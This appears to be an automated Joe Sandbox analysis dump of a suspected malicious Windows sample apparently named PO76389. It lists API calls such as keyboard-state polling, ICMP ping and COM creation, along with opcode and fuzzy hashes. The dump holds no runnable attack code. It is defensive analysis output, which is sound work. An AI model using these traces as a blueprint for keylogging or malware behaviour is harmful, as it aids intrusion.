                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004F725D
                                                    • LoadResource.KERNEL32(?,00000000), ref: 004F7269
                                                    • LockResource.KERNEL32(00000000), ref: 004F7276
                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004F7296
                                                    • LoadResource.KERNEL32(?,00000000), ref: 004F72A8
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004F72B7
                                                    • LockResource.KERNEL32(?), ref: 004F72C3
                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004F7322
                                                    Similarity
                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                    • String ID: L6V
                                                    • API String ID: 1433390588-2379597826
                                                    • Opcode ID: 8aa17d0990e6c7f3c1ec96181a82cee1fe34b2ff03d1bde92e0b56ea27cb4677
                                                    • Instruction ID: 7cf1eae5743816df5053ff720dc5d945e95e3fa6d5e40e4d979002bcc381930f
                                                    • Instruction Fuzzy Hash: DD31AEB590425ABBCB019F60ED89ABF7BB8FF04340B004416FE06D2250E73CD955EAB8
                                                    APIs
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004F843F
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004F8455
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004F8466
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004F8478
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004F8489
                                                    Similarity
                                                    • API ID: SendString$_memmove
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 2279737902-1007645807
                                                    • Opcode ID: 91671a4e0b55b31a3ff4dba9740d9267a0123e73c21c21882a92b31885b86203
                                                    • Instruction ID: a35f30011693665a15dfd74ceccc32cc0832017178b5f70c4d7611b5fc0fce06
                                                    • Instruction Fuzzy Hash: DE11C1A1A4026D79D720A7A2CC4ADFF7E7CFB91B04F00082EB411A71C1EEA45A45C6B4
                                                    APIs
                                                    • timeGetTime.WINMM ref: 004F809C
                                                      • Part of subcall function 004CE3A5: timeGetTime.WINMM(?,75A8B400,00526163), ref: 004CE3A9
                                                    • Sleep.KERNEL32(0000000A), ref: 004F80C8
                                                    • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 004F80EC
                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 004F810E
                                                    • SetActiveWindow.USER32 ref: 004F812D
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004F813B
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004F815A
                                                    • Sleep.KERNEL32(000000FA), ref: 004F8165
                                                    • IsWindow.USER32 ref: 004F8171
                                                    • EndDialog.USER32(00000000), ref: 004F8182
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    • Opcode ID: 5c445997f7ba6b64c23839eca72d432cccffda721b77475d7a0f413ccb41dd0c
                                                    • Instruction ID: ae3321daeec1c44d25ecad5fa557d4a1a0ad705d29b85d301a36715d79a1c35c
                                                    • Instruction Fuzzy Hash: 7821AFB0240208BFEB165B21BC8DE363B3BE720398B04011AF61586361CF764D4DB625
                                                    Similarity
                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 208665112-3771769585
                                                    • Opcode ID: d22f61621cc09f839a67e35e8eab8a8616aaf264a1d0507b8505d4e0ba545ec7
                                                    • Instruction ID: d17ccfce657fc13021b02d4c0e554cf9fabb80436972b1ec291234ddca55f07d
                                                    • Instruction Fuzzy Hash: AD1108B1908119ABDB24AB31AC45FEA777CEB00724F0000ABF50596290EEBCDB858668
                                                    Similarity
                                                    • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                    • String ID:
                                                    • API String ID: 3566271842-0
                                                    • Opcode ID: 5cbcbb012bc263274fdbbe8af7e77357c40082116e7220115a533dbba9afc647
                                                    • Instruction ID: 201afefde784cbff58da6e2eb325adfb5a3c22d408966c593c93e62118b66440
                                                    • Instruction Fuzzy Hash: AE711D75A00219AFDB10DFA5C884ADEBBB8FF48314F04849AE909AB251D734EE40CF94
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 004F3908
                                                    • SetKeyboardState.USER32(?), ref: 004F3973
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 004F3993
                                                    • GetKeyState.USER32(000000A0), ref: 004F39AA
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 004F39D9
                                                    • GetKeyState.USER32(000000A1), ref: 004F39EA
                                                    • GetAsyncKeyState.USER32(00000011), ref: 004F3A16
                                                    • GetKeyState.USER32(00000011), ref: 004F3A24
                                                    • GetAsyncKeyState.USER32(00000012), ref: 004F3A4D
                                                    • GetKeyState.USER32(00000012), ref: 004F3A5B
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 004F3A84
                                                    • GetKeyState.USER32(0000005B), ref: 004F3A92
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 0b320353d7dc84ce4ba5d7e82674f657a12a409278b6331b1499d543db51c1c6
                                                    • Instruction ID: 0bcc58201778fecf0effb2926aae5798fef50c95ebdef5000c3400efa92c3e0f
                                                    • Instruction Fuzzy Hash: FB51B860A0478C29FB35EFA588117BBABF45F01385F08459FD7C2562C2DA5C9B8CC769
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 004EFB19
                                                    • GetWindowRect.USER32(00000000,?), ref: 004EFB2B
                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 004EFB89
                                                    • GetDlgItem.USER32(?,00000002), ref: 004EFB94
                                                    • GetWindowRect.USER32(00000000,?), ref: 004EFBA6
                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 004EFBFC
                                                    • GetDlgItem.USER32(?,000003E9), ref: 004EFC0A
                                                    • GetWindowRect.USER32(00000000,?), ref: 004EFC1B
                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 004EFC5E
                                                    • GetDlgItem.USER32(?,000003EA), ref: 004EFC6C
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004EFC89
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004EFC96
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: cb3702b4e1e23dfc10fcc0054e52cb3f5fe3029e810c0956d9e074368577ecdd
                                                    • Instruction ID: 0db81d06687c26c77b77ecdddff34344052e1c4448b95530b0f52fd2e61cf004
                                                    • Instruction Fuzzy Hash: 10512071B00209AFDB18CFA9DD95AAEBBBAFB98311F148139F915D7390D774AD048B10
                                                    APIs
                                                      • Part of subcall function 004CB155: GetWindowLongW.USER32(?,000000EB), ref: 004CB166
                                                    • GetSysColor.USER32(0000000F), ref: 004CB067
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID:
                                                    • API String ID: 259745315-0
                                                    • Opcode ID: e9f6d4d94cf304310b4bf41b1cf219e3896c9295394e3fe3fc9ee3c7ff3b4bac
                                                    • Instruction ID: eaa5b44f36f1cba96a390e08220059d60359399adb7449af57764d10bc6f36cd
                                                    • Opcode Fuzzy Hash: e9f6d4d94cf304310b4bf41b1cf219e3896c9295394e3fe3fc9ee3c7ff3b4bac
                                                    • Instruction Fuzzy Hash: 8B41C3351005109FDB205F39E84AFBA3B75EB16721F18426AFD758A2E1C7348C45EBA6
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                    • String ID:
                                                    • API String ID: 136442275-0
                                                    • Opcode ID: 156b3f7c6e23dfb8567dc48f29857763a306993c2a9cd9472b483822ee660ae8
                                                    • Instruction ID: c6743a9a7ef636430402261006fe447bbf78b804ca8b8ab157c459c79ac176cc
                                                    • Opcode Fuzzy Hash: 156b3f7c6e23dfb8567dc48f29857763a306993c2a9cd9472b483822ee660ae8
                                                    • Instruction Fuzzy Hash: 5341F2B290411C6ADB21EB51CC65EEE73BCAB08314F1041E7F619A2151EB799BD4CF68
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 004B84E5
                                                    • __itow.LIBCMT ref: 004B8519
                                                      • Part of subcall function 004D2177: _xtow@16.LIBCMT ref: 004D2198
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __itow__swprintf_xtow@16
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 1502193981-2263619337
                                                    • Opcode ID: 197212c294785e0671fd869d5c992cb0cd21676da739628ba9c14277ce6fda33
                                                    • Instruction ID: 701713eaa0ceb53b064aaefb6251a15d2c65dd492437dda5f3858a22fa01c13e
                                                    • Opcode Fuzzy Hash: 197212c294785e0671fd869d5c992cb0cd21676da739628ba9c14277ce6fda33
                                                    • Instruction Fuzzy Hash: 0B412931600605EBDB24DF34D841FAA7BE9BF44314F20485FE449C7291FA399A42CB25
                                                    APIs
                                                    • _memset.LIBCMT ref: 004D5CCA
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    • __gmtime64_s.LIBCMT ref: 004D5D63
                                                    • __gmtime64_s.LIBCMT ref: 004D5D99
                                                    • __gmtime64_s.LIBCMT ref: 004D5DB6
                                                    • __allrem.LIBCMT ref: 004D5E0C
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D5E28
                                                    • __allrem.LIBCMT ref: 004D5E3F
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D5E5D
                                                    • __allrem.LIBCMT ref: 004D5E74
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004D5E92
                                                    • __invoke_watson.LIBCMT ref: 004D5F03
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                    • String ID:
                                                    • API String ID: 384356119-0
                                                    • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                    • Instruction ID: 8d964334dc49b26038b8e4b356881d5f883f09bd2c2a1d87b6f70490f31f3736
                                                    • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                    • Instruction Fuzzy Hash: 5E71F771A01B16ABD714AF6ACC51B6BB3A9AF00725F14422FF514D7781EF78DE008B98
                                                    APIs
                                                    • _memset.LIBCMT ref: 004F5816
                                                    • GetMenuItemInfoW.USER32(005718F0,000000FF,00000000,00000030), ref: 004F5877
                                                    • SetMenuItemInfoW.USER32(005718F0,00000004,00000000,00000030), ref: 004F58AD
                                                    • Sleep.KERNEL32(000001F4), ref: 004F58BF
                                                    • GetMenuItemCount.USER32(?), ref: 004F5903
                                                    • GetMenuItemID.USER32(?,00000000), ref: 004F591F
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 004F5949
                                                    • GetMenuItemID.USER32(?,?), ref: 004F598E
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004F59D4
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004F59E8
                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004F5A09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                    • String ID:
                                                    • API String ID: 4176008265-0
                                                    • Opcode ID: 9a36cf87d73cc3895ed88b4f037b397a2cbd7ef943b4649d9e595b21ca2ef2b1
                                                    • Instruction ID: 7bf4fdf52f2cd79fe68ca1e13faf41f55f72e5e153ec0ef69dcdeb245ed3372d
                                                    • Opcode Fuzzy Hash: 9a36cf87d73cc3895ed88b4f037b397a2cbd7ef943b4649d9e595b21ca2ef2b1
                                                    • Instruction Fuzzy Hash: D361CBB0900A4DEFDB15DFA8E888EBF7BB8EB01358F14011AE741A3251D378AD05DB25
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00519AA5
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00519AA8
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00519ACC
                                                    • _memset.LIBCMT ref: 00519ADD
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00519AEF
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00519B67
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow_memset
                                                    • String ID:
                                                    • API String ID: 830647256-0
                                                    • Opcode ID: ad8e83c5b32cd65567fcb7bc9ccdec98200bc6394dcbb1c44f9c194949b115c8
                                                    • Instruction ID: eb5e0bc2654097eb24a2463f80d9a5246f4f946d508486f2198cb6e92fe75f1a
                                                    • Opcode Fuzzy Hash: ad8e83c5b32cd65567fcb7bc9ccdec98200bc6394dcbb1c44f9c194949b115c8
                                                    • Instruction Fuzzy Hash: AE618B75900208AFEB10DFA8DC91EEE7BF8BF09304F144159FA19A7291C770AD85DBA4
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 004F3591
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 004F3612
                                                    • GetKeyState.USER32(000000A0), ref: 004F362D
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 004F3647
                                                    • GetKeyState.USER32(000000A1), ref: 004F365C
                                                    • GetAsyncKeyState.USER32(00000011), ref: 004F3674
                                                    • GetKeyState.USER32(00000011), ref: 004F3686
                                                    • GetAsyncKeyState.USER32(00000012), ref: 004F369E
                                                    • GetKeyState.USER32(00000012), ref: 004F36B0
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 004F36C8
                                                    • GetKeyState.USER32(0000005B), ref: 004F36DA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 656be838c1ff77c1202a2416320810cee88780d371bcfff13bdcb3868a847068
                                                    • Instruction ID: 59d00228232c2e2f2dcd307098812ff5ae44e0636184fd5d87f519caba71cf81
                                                    • Opcode Fuzzy Hash: 656be838c1ff77c1202a2416320810cee88780d371bcfff13bdcb3868a847068
                                                    • Instruction Fuzzy Hash: 114172705047CD7DFF315E6494143B7BAB06B2134AF04405BD7C6863C2EBA89BC8876A
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 004EA2AA
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 004EA2F5
                                                    • VariantInit.OLEAUT32(?), ref: 004EA307
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 004EA327
                                                    • VariantCopy.OLEAUT32(?,?), ref: 004EA36A
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004EA37E
                                                    • VariantClear.OLEAUT32(?), ref: 004EA393
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 004EA3A0
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004EA3A9
                                                    • VariantClear.OLEAUT32(?), ref: 004EA3BB
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004EA3C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: e392a756841232aa922de6cc76512cf177062d30b3611fcdc7179dd3b470d8c2
                                                    • Instruction ID: c0ff3831ecb9ce5648a64b3ad897cc25d35aaf8027218990980fdac2ebe2ea60
                                                    • Opcode Fuzzy Hash: e392a756841232aa922de6cc76512cf177062d30b3611fcdc7179dd3b470d8c2
                                                    • Instruction Fuzzy Hash: AF414D31900219AFCF01DFA5D8849DEBFB9FF08345F00806AF901A7251DB74AA59DBA5
                                                    APIs
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                    • CoInitialize.OLE32 ref: 0050B298
                                                    • CoUninitialize.COMBASE ref: 0050B2A3
                                                    • CoCreateInstance.COMBASE(?,00000000,00000017,0053D8FC,?), ref: 0050B303
                                                    • IIDFromString.COMBASE(?,?), ref: 0050B376
                                                    • VariantInit.OLEAUT32(?), ref: 0050B410
                                                    • VariantClear.OLEAUT32(?), ref: 0050B471
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 834269672-1287834457
                                                    • Opcode ID: 48f2a6ee085c431ddee1ceca2ef4157deb703b160c04b7e1323dce5a35bc2597
                                                    • Instruction ID: 18f173c7f03f3a59dbc1f0b468f76d1648b878fa85cd033332fe6913687def26
                                                    • Opcode Fuzzy Hash: 48f2a6ee085c431ddee1ceca2ef4157deb703b160c04b7e1323dce5a35bc2597
                                                    • Instruction Fuzzy Hash: 5F61AC70204701AFE710DF55C889BAEBBE8BF88714F14481EF9859B291D770EE48CB96
                                                    APIs
                                                    • WSAStartup.WS2_32(00000101,?), ref: 005086F5
                                                    • inet_addr.WS2_32(?), ref: 0050873A
                                                    • gethostbyname.WS2_32(?), ref: 00508746
                                                    • IcmpCreateFile.IPHLPAPI ref: 00508754
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005087C4
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005087DA
                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0050884F
                                                    • WSACleanup.WS2_32 ref: 00508855
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    • Opcode ID: b915ce4df16005a1794cd2b03e87eaa1c45ef7a88cc689ec55800e2190deed76
                                                    • Instruction ID: 7d24e70ee4017e02bd9e15171cab4f62010fa913f751978bea9de60354c44b23
                                                    • Opcode Fuzzy Hash: b915ce4df16005a1794cd2b03e87eaa1c45ef7a88cc689ec55800e2190deed76
                                                    • Instruction Fuzzy Hash: B151AE31604201AFDB10AF25CC85F6EBBE4FF48724F04882AF9969B2E1DB74E804DB51
                                                    APIs
                                                    • _memset.LIBCMT ref: 00519C68
                                                    • CreateMenu.USER32 ref: 00519C83
                                                    • SetMenu.USER32(?,00000000), ref: 00519C92
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00519D1F
                                                    • IsMenu.USER32(?), ref: 00519D35
                                                    • CreatePopupMenu.USER32 ref: 00519D3F
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00519D70
                                                    • DrawMenuBar.USER32 ref: 00519D7E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                    • String ID: 0
                                                    • API String ID: 176399719-4108050209
                                                    • Opcode ID: 7dda052996b7e94b4a6849d8ce6a78f7a4bb99abc73972705e0e47b969186c1a
                                                    • Instruction ID: d4c10c150bfe60b1a598474a3696364084720cf4c6dabf8c317e812975d3d155
